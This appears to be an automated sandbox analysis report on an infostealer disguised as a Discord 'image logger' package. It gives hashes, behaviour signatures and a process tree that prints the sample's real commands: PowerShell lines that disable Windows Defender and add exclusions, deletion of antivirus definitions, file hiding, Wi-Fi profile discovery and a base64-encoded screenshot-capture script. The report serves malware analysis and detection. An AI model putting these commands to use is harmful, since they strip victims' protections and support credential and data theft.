Analysis

  • max time kernel
    67s
  • max time network
    69s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    20-11-2024 20:15

General

  • Target

    discord-Image-logger-beam.zip

  • Size

    31.6MB

  • MD5

    06531f20be16e3f95af7a9dbb9121a75

  • SHA1

    047bf62c3030b32f2c77169a77a833a42f0e1ddc

  • SHA256

    b5b39a2eb7907ef041dd7ff25795319e92268b61b2f54edb8f42b7ace6a8f2bd

  • SHA512

    f937c46a8e7eeda3aca565e87a95e5c8fac1c85d3a62d9cbdc21e3def6c9aa663732d3fd9618232c9d2cab0249a7168c5a57caea872d7b0a37cacfb2b98c79a6

  • SSDEEP

    786432:Z4LAsr+IWGQ72rvzDrLqCsrg6iZhd81vUAAmsJ0YqRw:ZargGQ7KvnrLKrg68OZAmsJ0a

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 2 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 4 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 10 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 5 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 2 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 38 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\discord-Image-logger-beam.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1420
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1648
    • C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe
      "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe
        "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3724
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4740
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3712
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3956
          • C:\Program Files\Windows Defender\MpCmdRun.exe
            "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            4⤵
            • Deletes Windows Defender Definitions
            PID:1684
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1228
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Error -100 (the initial part of the request has been received by the server and that the client should proceed with the request or ignore the response if the request has already finished)', 0, 'ERROR', 0+16);close()"
            4⤵
              PID:2584
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3264
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:644
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3392
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3504
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4792
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              4⤵
                PID:2100
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1080
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                4⤵
                  PID:2252
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4460
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4324
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2052
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic path win32_VideoController get name
                  4⤵
                  • Detects videocard installed
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3684
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe""
                3⤵
                • Hide Artifacts: Hidden Files and Directories
                • Suspicious use of WriteProcessMemory
                PID:520
                • C:\Windows\system32\attrib.exe
                  attrib +h +s "C:\Users\Admin\Desktop\discord-Image-logger-beam\Setup.exe"
                  4⤵
                  • Views/modifies file attributes
                  PID:2968
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‎ .scr'"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:752
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‎ .scr'
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3060
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3392
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:3336
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3504
                • C:\Windows\system32\tasklist.exe
                  tasklist /FO LIST
                  4⤵
                  • Enumerates processes with tasklist
                  PID:1744
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                3⤵
                  PID:3264
                  • C:\Windows\System32\Wbem\WMIC.exe
                    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2500
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  PID:3128
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1448
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:2636
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:1092
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:4792
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:892
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:456
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:3900
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:2148
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:1908
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:3956
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:1848
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:2808
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1144
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qszze5xt\qszze5xt.cmdline"
                                    5⤵
                                      PID:344
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7F6.tmp" "c:\Users\Admin\AppData\Local\Temp\qszze5xt\CSCF14A83BC9B89419DBEE0E097A43B7B89.TMP"
                                        6⤵
                                          PID:3852
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                    3⤵
                                      PID:2212
                                      • C:\Windows\system32\attrib.exe
                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                        4⤵
                                        • Drops file in Drivers directory
                                        • Views/modifies file attributes
                                        PID:4248
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1780
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:2796
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                          3⤵
                                            PID:2448
                                            • C:\Windows\system32\attrib.exe
                                              attrib +r C:\Windows\System32\drivers\etc\hosts
                                              4⤵
                                              • Drops file in Drivers directory
                                              • Views/modifies file attributes
                                              PID:2612
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:1852
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:4792
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:2212
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:2160
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:4152
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:3872
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        4⤵
                                                          PID:892
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:1860
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:1852
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
